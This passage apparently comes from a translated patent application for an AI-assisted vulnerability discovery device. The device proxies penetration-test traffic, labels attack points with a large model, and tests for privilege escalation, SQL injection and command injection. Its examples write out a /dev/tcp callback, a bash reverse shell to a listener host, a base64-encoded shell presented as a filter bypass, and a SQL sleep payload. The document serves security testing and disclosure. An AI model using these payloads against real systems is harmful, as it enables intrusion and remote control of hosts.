SQL statement concatenation, the SQL executed by the above injection parameters will ultimately delay the original response data by 2 seconds. This type of simple and intuitive judgment rule does not require evaluation by a large AI model and can directly confirm the existence of the vulnerability. Other injection tests involving comprehensive analysis, such as SQL anomaly injection and blind injection tests, require the use of large AI models for result evaluation.

[0091] In some embodiments of this application, after obtaining the corresponding target parameter information based on the payload template, the data packets are spliced ​​at the attack point based on the target parameter information to obtain the test data packets.

[0092] Optionally, if the preset vulnerability type is command injection; The step of determining the test data packet corresponding to the vulnerability attack point based on the target parameter information and the vulnerability attack point, and obtaining the test data packet, includes: Based on the command injection and the pre-set payload template, the target parameter information corresponding to the command injection is determined, wherein the target parameter information includes the address information of the preset vulnerability mining module, the modified system time and the reverse connection service; At the vulnerability attack point, the target parameter information is added to the business data packet to generate the test data packet.

[0093] Specifically, the embodiments of this application can be applied not only to intuitively judging results through test results, but also to situations where there is no feedback.

[0094] For example: Example 2: Verification of a command injection vulnerability without echo. An application has a function to modify the system time. The vulnerability discovery device receives the following request data packet: POST / sys / uptime HTTP / 1.1 Host: 10.10.254.28:8080 Cookie: PHPSESSID=lb1dco6q2 time=2020-01-01 00:00:00 This data packet uses a POST request to modify the system time to 2020-01-01 00:00:00. The response data packet content is as follows: HTTP / 1.1 200 OK Content-Type: application / json {'msg':'Update successful'} The data returned by the AI ​​big data model after analyzing the attack points of the above data packets is as follows: POST / sys / uptime HTTP / 1.1 Host: 10.10.254.28:8080 Cookie: PHPSESSID=lb1dco6q2 time=${1} The AI ​​model marks potential attack points with time=${1} and retains session information (cookies). The payload type can be configured through the web interface of the vulnerability discovery device. Taking a non-invasive reverse connection service notification as an example, assuming the vulnerability discovery device's IP is 192.168.33.11 and it has a reverse connection service enabled on port 9999, the request data packet after assembling the reverse connection service notification payload is as follows: POST / sys / uptime HTTP / 1.1 Host: 10.10.254.28:8080 Cookie: PHPSESSID=lb1dco6q2 time=2020-01-01 00:00:00;echo "vid:xdtd4co"> / dev / tcp / 192.168.33.11 / 9999 The above payload executes by sending the message "vid:xdtd4co" to port 9999 of 192.168.33.11 using TCP on the local machine. After replaying the data packet containing this payload, the vulnerability discovery device's reverse connection service receives the message "vid:xdtd4co" from the payload, proving the existence of a command injection vulnerability. The input data for attack result analysis at this point is ({content} variable): {"response-packet":"raw response packet","out-of-band":"vid:xdtd4co"} Example 3: Exploiting a Command Injection Vulnerability Without Echo. In some security-hardened environments, the echo command cannot be used, so the above reverse connection notification may not be able to execute. When further forensic investigation of the target vulnerability is required, a reverse shell payload can be configured in the vulnerability discovery device for exploitation. Assuming the vulnerability discovery device's IP is 192.168.33.11, and it has a reverse shell listener on port 4444, the request data packet after assembling a reverse shell using the command injection vulnerability from Example 1 is as follows: POST / sys / uptime HTTP / 1.1 Host: 10.10.254.28:8080 Cookie: PHPSESSID=lb1dco6q2 time=2020-01-01 00:00:00;bash -i>& / dev / tcp / 192.168.33.11 / 4444 0>&1 The above payload generates an interactive shell on the local machine and redirects input and output to port 4444 of 192.168.33.11 using the TCP protocol. After replaying the data packet containing this payload, the session management module of the vulnerability discovery device receives the target's shell session terminal. Through this session, operating system commands can be executed on the target environment, proving that the command injection vulnerability has been successfully exploited to gain control of the target. At this point, the attack result analysis input data is ({content} variable): {"response-packet":" The original response data packet, "session":{"id":"xxxd","ip":"10.1.20.10"}} Example 4: Using encoding to bypass security checks. Some environments intercept and verify command execution payloads, such as space verification and / dev / tcp keyword verification. With encoding enabled and space verification bypassed, the data packet after the reverse shell assembly in Example 2 is as follows. POST / sys / uptime HTTP / 1.1 Host: 10.10.254.28:8080 Cookie: PHPSESSID=lb1dco6q2 time=2020-01-01 00:00:00;{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMzLjExLzQ0NDQgMD4mMQo=}|{base64,-d}|{bash,-i} The above payload decodes base64 encoded data and then interprets and executes it using bash. The execution result is the same as in Example 2.

[0095] Optionally, if the preset vulnerability type is an unauthorized access test; The step of determining the test data packet corresponding to the vulnerability attack point based on the target parameter information and the vulnerability attack point, and obtaining the test data packet, includes: If the service data packet has the first permission, the first parameter information corresponding to the service data packet with the first permission is determined according to the pre-set payload template; Obtain the second parameter information corresponding to the business data packet with the second permission, where the first permission is higher than the second permission; At the vulnerability attack point, the first parameter information is replaced with the second parameter information, and the test data packet is generated based on the second parameter information.

[0096] like Figure 3 As shown, the target type of the cloud platform under test is a Web service, the access protocol is HTTPS, and the Burp Suite plugin is used as the request proxy.

[0097] Preparation: Log in to the high-privilege account system using browser A (assuming its browser session ID is lb1dco6q2-system); log in to the low-privilege account normal using browser B (assuming its browser session ID is lb1dco6q2-normal). The user configures an HTTP proxy in browser A on the client terminal to listen on the Burp Suite port; in the vulnerability discovery device, the user configures login credentials for a low-privilege account in browser B. The credential parameters are related to the implementation of the target technology being tested, and are generally request headers or token parameters. In this example, the cookie parameter is PHPSESSID.

[0098] The principle behind determining privilege escalation vulnerabilities is as follows: The high-privilege account "system" has access to the user list and is expected to call the API with status code 200 to obtain the list data; the low-privilege account "normal" does not have access to the user list and is expected to call the API with status code 403, thus failing to obtain the data.

[0099] Step 1): The tester logs into the administrator account on the client terminal and initiates a request to view the user list, that is, using browser A on the client terminal to access the user list page normally. At this time, the data packet content is as follows: GET / user / list HTTP / 1.1 Host: 10.10.254.28:8080 Cookie: PHPSESSID=lb1dco6q2-system Step 2: Since browser A is a high-privilege account, the original data packet is forwarded to the cloud platform system (target terminal). The target terminal returns the user data, and the user can normally see the user list page and user data in the browser on the client terminal.

[0100] Step 3: The client terminal copies the request to view the user list and sends it to the vulnerability discovery device. The vulnerability discovery device receives the data packet requesting the user list and replaces the login credentials with a pre-set low-privilege account ("normal"). The content of the replaced data packet request is as follows: GET / user / list HTTP / 1.1 Host: 10.10.254.28:8080 Cookie: PHPSESSID=lb1dco6q2-normal Step 4): The vulnerability discovery device uses an AI agent to analyze and label attack points in data packets.

[0101] Step 5): Based on the configuration range and annotation results, the vulnerability discovery device performs parameter replacement, payload assembly, and replay test on the data packets.

[0102] Step 6): Test using different vulnerability types: Step 6.1, Example of unauthorized access: Account credentials are for a low-privilege ordinary user: https: / / 10.10.10.11 / users / list?uid=normaluid Step 6.2, Example of replacing the SQL injection payload: https: / / 10.10.10.11 / users / list?uid=systemid&name=x' sleep(3) –” Step 6.3, Example of replacing the command injection payload: https: / / 10.10.10.11 / devtool / ping?uid=systemid&ip=1.1.1.1;{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMzLjExLzQ0NDQgMD4mMQo=}|{base64,-d}|{bash,-i} Criteria for determining privilege escalation vulnerabilities: A 403 response code indicates that the normal account does not have access to the interface, and there is no privilege escalation vulnerability. A 200 response code indicates that the normal account can access the interface, and there is a privilege escalation vulnerability. The vulnerability discovery device will add a record of the privilege escalation vulnerability for this data request URL to the vulnerability list. Testers can view the vulnerability test feedback record in real time through the vulnerability discovery device's web page.

[0103] SQL injection detection criteria: Based on the injection type and response data, make a comprehensive judgment, such as delayed injection or exception injection.

[0104] Command injection detection criteria: Based on the injection type, response data, reverse connection service, and session service, a comprehensive judgment is made, such as delayed injection, reverse connection service notification, and reverse connection shell.

[0105] Step 7) View the real-time vulnerability list on the vulnerability discovery device's web page.

[0106] In the aforementioned cloud platform scenario test example, users only need to trigger interface data access using a high-privilege account. The relevant request data packets can then be forwarded to the vulnerability discovery device, automatically completing the detection process for data interface privilege escalation, SQL injection, and command injection vulnerabilities. For areas sensitive to privilege escalation vulnerabilities, ambiguous replay response data, and business design flaws, testers only need to repeatedly trigger the relevant function buttons in the browser for retesting and confirmation, improving efficiency while simplifying the retesting process. Furthermore, the login credentials used by the vulnerability discovery device originate from browser B. When triggering human-machine verification in the target environment (such as complex CAPTCHAs, clicking confirmation, etc.), verification can be manually completed in browser B, allowing the vulnerability discovery device to skip human-machine verification.

[0107] Some embodiments of this application incorporate various vulnerability penetration plugins and payload templates, such as privilege escalation testing, SQL injection, command injection, and publicly known vulnerability exploits (EXPs). After obtaining the vulnerability attack point, the business data packet is reassembled with the target parameter information on the payload template to obtain the reassembled test data packet.

[0108] The analysis and judgment models in this application embodiment are AI large-scale models. These models can analyze parameter naming, path structure, and cookie / token usage in business data packets to infer which fields may involve access control and identify attack points. Through these AI large-scale models, specific sub-tasks (attack point location analysis, multi-source evidence fusion and judgment) can be performed, empowering intelligent analysis, decision-making, and judgment capabilities. The AI ​​large-scale model only handles data packet attack point analysis and response result judgment tasks that require intelligent analysis. The highly repetitive payload assembly and combination parts are still implemented programmatically by the vulnerability discovery device, improving execution efficiency while reducing model token consumption costs.

[0109] In some embodiments of this application, the analysis model and judgment model are large models, which can be trained large models. These large models can be used to process data packet attack point analysis that requires intelligent analysis, and can also be used to analyze response result judgment tasks, thereby improving the accuracy and efficiency of automated testing.

[0110] Optionally, the step of using pre-set test result judgment prompts and judgment models to judge the test results corresponding to the test data packet and determine whether the vulnerability attack point has a vulnerability includes: Based on the test results, the system determines whether one or more of the test results match the preset vulnerability results using the prompt words and the judgment model. If the test results match the preset vulnerability results, it is determined that a vulnerability exists at the vulnerability attack point.

[0111] Specifically, based on the above embodiment, step 4: the vulnerability discovery device performs vulnerability penetration testing on each test result according to the preset test scope, payload type, and parameter whitelist.

[0112] Step 5: Users can view the vulnerability list and forensic information in real time on the web interface of the vulnerability discovery device. For vulnerabilities without feedback, feedback information of the target vulnerability payload can be obtained from the reverse connection service and session list. If it is necessary to retest and confirm the vulnerability, it is only necessary to trigger the request a second time through the client, such as triggering it by clicking twice in the browser or replaying the request through BrupSuite or Fiddler.

[0113] Some embodiments of this application use large AI models to analyze attack points, replace parameters in request data packets, assemble penetration testing payloads, and replay the data packets to test whether the target has the vulnerability.

[0114] The test scope and test parameters of the business data packets obtained in this application embodiment can be manually intervened. Since the data packets received by the vulnerability mining device are all generated by manual penetration testing, the privilege escalation, SQL injection, and command injection requests constructed by manual penetration are also forwarded to the vulnerability mining device. The vulnerability mining device can automatically perform AI attack point analysis and payload assembly based on the request, and perform automated vulnerability mining tests, which can discover potential unknown vulnerabilities and logic vulnerabilities in the system.

[0115] Optionally, the method further includes: if the test result is of a displayable type, displaying the test result through the display interface of a preset vulnerability discovery module; Optionally, if the test result is of the no-echo type, the test result is received through the reverse connection service of the preset vulnerability mining module.

[0116] This application embodiment adds a request proxy and vulnerability discovery device to both the client terminal and the target terminal. Data packets generated during the manual penetration testing process are copied and forwarded to the vulnerability discovery device. All testing actions are triggered manually, avoiding blind testing of the target environment using traditional traversal methods, thus minimizing the impact on the target environment. The vulnerability discovery device, for testing the discovery of unknown vulnerabilities, utilizes AI large-scale model technology to intelligently identify and label attack points in data packets. Combined with a configurable payload template library, this improves the efficiency and accuracy of target attack point identification while reducing token consumption.

[0117] The vulnerability discovery device allows for configuration of test scope and payload type parameters via a web interface. Based on forwarded data packets, it can automatically perform attack point analysis, parameter replacement, payload assembly, and replay testing. Furthermore, by constructing a multi-dimensional feedback mechanism that integrates response-based, out-of-band, and session-established signals, the device achieves unified judgment of vulnerabilities with and without feedback. This enables automated discovery and testing of unknown vulnerabilities, resolving issues related to vulnerabilities without feedback, the discovery of unknown vulnerabilities, and forensic investigation of target vulnerabilities. Based on data encoding technology, it overcomes some limitations of security protection and interception rules.

[0118] This application's embodiments improve vulnerability discovery testing efficiency while reducing AI model token consumption by adding a request proxy device to the client terminal and relying on an AI large-scale model to identify and label attack points in data packets. Combined with a configurable payload template library, this achieves automated vulnerability discovery capabilities for unknown vulnerabilities in target applications. By constructing a multi-dimensional feedback mechanism that integrates response-based, out-of-band, and session-established signals, it achieves unified judgment of vulnerabilities with and without feedback. By bypassing some security verification protections through coding methods, it improves testing accuracy and discovery rate, simplifies vulnerability discovery testing complexity, and overcomes the limitations of automated penetration testing tools in unknown vulnerability discovery and human-machine verification, reducing the time, manpower, and financial costs of enterprise software security penetration testing. This invention, by combining the contextual awareness capabilities of manual penetration testing with the semantic analysis capabilities of AI models, achieves for the first time automated, high-precision, and low-disturbance discovery of business logic vulnerabilities and vulnerabilities without feedback, overcoming the technical bottleneck of traditional rule engines in discovering unknown vulnerabilities.

[0119] It should be noted that each of the implementable methods in this embodiment can be implemented individually or in any combination without conflict. This application does not limit this.

[0120] Another embodiment of this application provides a vulnerability detection device for performing the vulnerability detection method provided in the above embodiments.

[0121] like Figure 4 The diagram shown is a structural schematic of a vulnerability detection device provided in an embodiment of this application. The vulnerability detection device includes an acquisition module 401, an analysis module 402, a determination module 403, a reconstruction module 404, and a judgment module 405, wherein: Module 401 is used to acquire business data packets; The analysis module 402 is used to perform vulnerability attack point analysis on the business data packet using pre-set attack point analysis prompts and vulnerability attack point analysis models to obtain the vulnerability attack points of the business data packet; The determination module 403 is used to determine the target parameter information corresponding to the preset vulnerability type of the vulnerability attack point according to the preset payload template, wherein the preset payload template includes the vulnerability type and the parameter information corresponding to the vulnerability type; The reassembly module 404 is used to determine the test data packet corresponding to the vulnerability attack point based on the target parameter information and the vulnerability attack point; The judgment module 405 is used to judge the test results corresponding to the test data packet by using pre-set test result judgment prompts and judgment models, and to determine whether the vulnerability attack point has a vulnerability.

[0122] Regarding the apparatus in this embodiment, the specific manner in which each module performs its operations has been described in detail in the embodiments related to the method, and will not be elaborated upon here.

[0123] Some embodiments of this application set up two models: a vulnerability attack point analysis model and a judgment model. The vulnerability attack point analysis model is then used to analyze the vulnerability attack points in the business data packets. Then, based on the preset vulnerability type and payload template, the corresponding target parameter information is selected. Subsequently, a test data packet is generated based on the vulnerability attack point and the target parameter information. After the test data packet is executed, the test result judgment prompt and judgment model are used to judge the test result and determine whether there is a vulnerability at the vulnerability attack point. In this way, the possible location of the vulnerability attack point can be determined first, and then it can be judged whether there is a vulnerability at the vulnerability attack point. This can identify unknown vulnerabilities, improve the efficiency of manual penetration testing and the accuracy and discovery rate of automated penetration testing, and realize the intelligent mining capability of automated penetration testing.

[0124] Another embodiment of this application further supplements the description of the vulnerability detection device provided in the above embodiments.

[0125] Optionally, the determining module is configured to: Determine the preset vulnerability type corresponding to the vulnerability attack point. The preset vulnerability type includes one or more of privilege escalation testing, SQL injection, or command injection. The target parameter information corresponding to the preset vulnerability type is obtained by searching within the pre-set payload template.

[0126] Some embodiments of this application pre-set a payload template, which includes vulnerability types and parameter information corresponding to the vulnerability types. The payload template can be set according to the vulnerability type of the determined vulnerability attack point, or it can be set as needed, to obtain the corresponding target parameter information, thereby enabling testing of one or more vulnerability types on the same attack point.

[0127] Optionally, if the preset vulnerability type is SQL injection, the determining module is used to: The target parameter information corresponding to the SQL injection is determined in the pre-set payload template. The SQL injection includes SQL anomaly injection or blind injection testing. The target parameter information includes at least a delay time. At the vulnerability attack point, the SQL statement of the business data packet and the SQL statement of the delay time are concatenated to generate the SQL statement of the test data packet.

[0128] In some embodiments of this application, after obtaining the corresponding target parameter information based on the payload template, the service data packet and the delay time are concatenated at the attack point based on the target parameter information to obtain the test data packet.

[0129] Optionally, if the preset vulnerability type is command injection, the determining module is configured to: Based on the command injection and the pre-set payload template, the target parameter information corresponding to the command injection is determined, wherein the target parameter information includes the address information of the preset vulnerability mining module, the modified system time and the reverse connection service; At the vulnerability attack point, the target parameter information is added to the business data packet to generate the test data packet.

[0130] Optionally, if the preset vulnerability type is an unauthorized access test; the determining module is used to: If the service data packet has the first permission, the first parameter information corresponding to the service data packet with the first permission is determined according to the pre-set payload template; Obtain the second parameter information corresponding to the business data packet with the second permission, where the first permission is higher than the second permission; At the vulnerability attack point, the first parameter information is replaced with the second parameter information, and the test data packet is generated based on the second parameter information.

[0131] Some embodiments of this application incorporate various vulnerability penetration plugins and payload templates, such as privilege escalation testing, SQL injection, command injection, and publicly known vulnerability exploits (EXPs). After obtaining the vulnerability attack point, the business data packet is reassembled with the target parameter information on the payload template to obtain the reassembled test data packet.

[0132] Optionally, the determination module is used to: Based on the test results, the system determines whether one or more of the test results match the preset vulnerability results using the prompt words and the judgment model. If the test results match the preset vulnerability results, it is determined that a vulnerability exists at the vulnerability attack point.

[0133] Some embodiments of this application use large AI models to analyze attack points, replace parameters in request data packets, assemble penetration testing payloads, and replay the data packets to test whether the target has the vulnerability.

[0134] Optionally, the determination module is used to: If the test result is of a displayable type, the test result will be displayed through the display interface of the preset vulnerability discovery module.

[0135] Optionally, the determination module is used to: If the test result is of the no-echo type, the test result is received through the reverse connection service of the preset vulnerability mining module.

[0136] Optionally, the acquisition module is used to: The service data packet is obtained by using a preset request proxy port. The service data packet includes at least HTTP type data packet or TCP type data packet.

[0137] Some embodiments of this application perform manual penetration data packet copying and forwarding through a request proxy device, without affecting the original request process, without relying on external network devices, but at the same time compatible with external network device traffic forwarding, and also support data import from external tools.

[0138] Regarding the apparatus in this embodiment, the specific manner in which each module performs its operations has been described in detail in the embodiments related to the method, and will not be elaborated upon here.

[0139] It should be noted that each of the implementable methods in this embodiment can be implemented individually or in any combination without conflict. This application does not limit this.

[0140] This application also provides a computer-readable storage medium storing a computer program thereon, which, when executed by a processor, can perform the operation of any of the methods corresponding to the vulnerability detection methods provided in the above embodiments.

[0141] This application also provides a computer program product, which includes a computer program, wherein when the computer program is executed by a processor, it can implement the operation of any of the methods corresponding to the vulnerability detection methods provided in the above embodiments.

[0142] like Figure 5 As shown, some embodiments of this application provide an electronic device 500, which includes: a memory 510, a processor 520, and a computer program stored in the memory 510 and executable on the processor 520. When the processor 520 reads the program from the memory 510 via a bus 530 and executes the program, it can implement the methods of any of the embodiments included in the above-described vulnerability detection method.

[0143] Processor 520 can process digital signals and can include various computing architectures. For example, it can be a complex instruction set computer architecture, a reduced instruction set computer architecture, or an architecture that implements multiple instruction set combinations. In some examples, processor 520 can be a microprocessor.

[0144] The memory 510 can be used to store instructions executed by the processor 520 or data related to the execution of instructions. These instructions and / or data may include code for implementing some or all of the functions of one or more modules described in the embodiments of this application. The processor 520 of this disclosure embodiment can be used to execute the instructions in the memory 510 to implement the methods shown above. The memory 510 includes dynamic random access memory, static random access memory, flash memory, optical memory, or other memories well known to those skilled in the art.

[0145] The above are merely embodiments of this application and are not intended to limit the scope of protection of this application. Various modifications and variations can be made to this application by those skilled in the art. Any modifications, equivalent substitutions, improvements, etc., made within the spirit and principles of this application should be included within the scope of protection of this application. It should be noted that similar reference numerals and letters in the following figures indicate similar items; therefore, once an item is defined in one figure, it does not need to be further defined and explained in subsequent figures.

[0146] The above description is merely a specific embodiment of this application, but the scope of protection of this application is not limited thereto. Any variations or substitutions that can be easily conceived by those skilled in the art within the scope of the technology disclosed in this application should be included within the scope of protection of this application. Therefore, the scope of protection of this application should be determined by the scope of the claims.

[0147] It should be noted that, in this document, relational terms such as "first" and "second" are used only to distinguish one entity or operation from another, and do not necessarily require or imply any such actual relationship or order between these entities or operations. Furthermore, the terms "comprising," "including," or any other variations thereof are intended to cover non-exclusive inclusion, such that a process, method, article, or apparatus that comprises a list of elements includes not only those elements but also other elements not expressly listed, or elements inherent to such a process, method, article, or apparatus. Without further limitations, an element defined by the phrase "comprising one..." does not exclude the presence of other identical elements in the process, method, article, or apparatus that includes said element.

Claims

1. A vulnerability detection method, characterized in that, The method includes: Obtain business data packets; Using pre-set attack point analysis prompts and vulnerability attack point analysis models, vulnerability attack point analysis is performed on the business data packets to obtain the vulnerability attack points of the business data packets; The target parameter information corresponding to the preset vulnerability type of the vulnerability attack point is determined according to the preset payload template, wherein the preset payload template includes the vulnerability type and the parameter information corresponding to the vulnerability type; Based on the target parameter information and the vulnerability attack point, determine the test data packet corresponding to the vulnerability attack point; Using pre-set test result judgment prompts and judgment models, the test results corresponding to the test data packet are judged to determine whether the vulnerability attack point has a vulnerability.

2. The vulnerability detection method according to claim 1, characterized in that, The step of determining the target parameter information corresponding to the preset vulnerability type of the vulnerability attack point based on the preset payload template includes: Determine the preset vulnerability type corresponding to the vulnerability attack point. The preset vulnerability type includes one or more of privilege escalation testing, SQL injection, or command injection. The target parameter information corresponding to the preset vulnerability type is obtained by searching within the pre-set payload template.

3. The vulnerability detection method according to claim 2, characterized in that, If the preset vulnerability type is SQL injection; The step of determining the test data packet corresponding to the vulnerability attack point based on the target parameter information and the vulnerability attack point, and obtaining the test data packet, includes: The target parameter information corresponding to the SQL injection is determined in the pre-set payload template. The SQL injection includes SQL anomaly injection or blind injection testing. The target parameter information includes at least a delay time. At the vulnerability attack point, the SQL statement of the business data packet and the SQL statement of the delay time are concatenated to generate the SQL statement of the test data packet.

4. The vulnerability detection method according to claim 2, characterized in that, If the preset vulnerability type is command injection; The step of determining the test data packet corresponding to the vulnerability attack point based on the target parameter information and the vulnerability attack point, and obtaining the test data packet, includes: Based on the command injection and the pre-set payload template, the target parameter information corresponding to the command injection is determined, wherein the target parameter information includes the address information of the preset vulnerability mining module, the modified system time and the reverse connection service; At the vulnerability attack point, the target parameter information is added to the business data packet to generate the test data packet.

5. The vulnerability detection method according to claim 2, characterized in that, The preset vulnerability type is privilege escalation testing; The step of determining the test data packet corresponding to the vulnerability attack point based on the target parameter information and the vulnerability attack point, and obtaining the test data packet, includes: If the service data packet has the first permission, the first parameter information corresponding to the service data packet with the first permission is determined according to the pre-set payload template; Obtain the second parameter information corresponding to the business data packet with the second permission, where the first permission is higher than the second permission; At the vulnerability attack point, the first parameter information is replaced with the second parameter information, and the test data packet is generated based on the second parameter information.

6. The vulnerability detection method according to claim 1, characterized in that, The step of using pre-set test result judgment prompts and judgment models to judge the test results corresponding to the test data packet and determine whether the vulnerability attack point has a vulnerability includes: Based on the test results, the system determines whether one or more of the test results match the preset vulnerability results using the prompt words and the judgment model. If the test results match the preset vulnerability results, it is determined that a vulnerability exists at the vulnerability attack point.

7. The vulnerability detection method according to claim 1, characterized in that, The method further includes: If the test result is of a displayable type, the test result will be displayed through the display interface of the preset vulnerability discovery module.

8. The vulnerability detection method according to claim 1, characterized in that, The method further includes: If the test result is of the no-echo type, the test result is received through the reverse connection service of the preset vulnerability discovery device.

9. The vulnerability detection method according to claim 1, characterized in that, The acquisition of the service data packet includes: The service data packet is obtained by using a preset request proxy port. The service data packet includes at least HTTP type data packet or TCP type data packet.

10. An electronic device, characterized in that, The system includes a memory, a processor, and a computer program stored in the memory and executable on the processor, wherein the processor, when executing the program, implements the vulnerability detection method according to any one of claims 1-9.

11. A computer-readable storage medium, characterized in that, The computer-readable storage medium stores a computer program, characterized in that, when the program is executed by a processor, it can implement the vulnerability detection method according to any one of claims 1-9.

12. A computer program product, said computer program product comprising a computer program, wherein, When the computer program is executed by a processor, it can implement the vulnerability detection method according to any one of claims 1-9.